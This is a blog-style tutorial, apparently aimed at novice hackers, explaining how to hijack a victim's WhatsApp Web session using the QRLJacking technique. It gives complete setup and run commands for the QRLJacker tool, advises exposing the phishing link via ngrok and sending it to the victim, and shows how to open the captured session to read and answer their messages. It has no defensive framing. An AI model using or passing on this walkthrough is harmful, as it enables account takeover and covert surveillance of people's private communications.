QRL Jacking Technique Used By Hackers To Access WhatsApp Web Session | Explained

The most common question I receive from novice hackers is, "How can I hack WhatsApp without touching the victim's device?" Today, I will demonstrate how a hacker can access a victim's account without physically interacting with the device or requesting an OTP, solely by using social engineering techniques.

Before diving into this information, let me clarify one thing to help you understand what we are going to do. WhatsApp has end-to-end encryption, making it nearly impossible to directly spy on or read a victim's WhatsApp messages. Different methods are employed under various conditions and situations, such as MAC spoofing, OTP phishing, SS7 attacks, and others.

QRLJacking

In this article, I’ll show you a method known as QRLJacking, in which the attacker sends a malicious link to the target device, tricking them into scanning their WhatsApp QR code. By doing so, the attacker can capture the WhatsApp Web session, allowing them to read, spy on, or respond to messages.

Requirements

• Linux/macOS (Linux Recommended)
• Firefox Latest Version
• Python 3.7+

I am going to show a Linux tutorial in this article. 

Steps

• First of all, you have to download the driver for firefox and setup in your Linux system using the commands given below:

Download Latest-geckodriver 

tar -xvf <-type-geckodriver-tar-package-name->

chmod +x geckodriver

sudo mv -f geckodriver /usr/local/share/geckodriver

sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver

sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

• Now download and set up the QRLJacking tool given commands

git clone https://github.com/OWASP/QRLJacking

cd QRLJacking/QRLJacker

pip install -r requirements.txt

python3 QrlJacker.py

Now the QRLJacker interface opens on your Terminal as shown in the image.

Now we are ready to perform vector QR Jacking attack, type given commands:

use grabber/whatsapp

set port 4444

run

I am testing this tool on my localhost. You can use port forwarding for out-of-LAN devices, and I recommend using ngrok for this purpose. In this tutorial, my port is 4444, and the host is 0.0.0.0. Therefore, the QR code link in my case is 0.0.0.0:4444.

Now, send that link to the victim. Once the victim scans their WhatsApp Web QR code, the hacker or attacker will obtain a session saved in this tool, allowing them to access the WhatsApp Web session later.

• Press Ctrl +C to intercept the QRJacker tool and type the commands given below:

sessions

• Now the list of saved sessions is shown on your Terminal (In my case "0")

sessions -i 0

Now wait a few seconds and Firefox automatically launched and you get a WhatsApp web session of the victim as shown in the image given below.

I hope this information is helpful for you, save bookmarks for future posts and join our community for latest updates.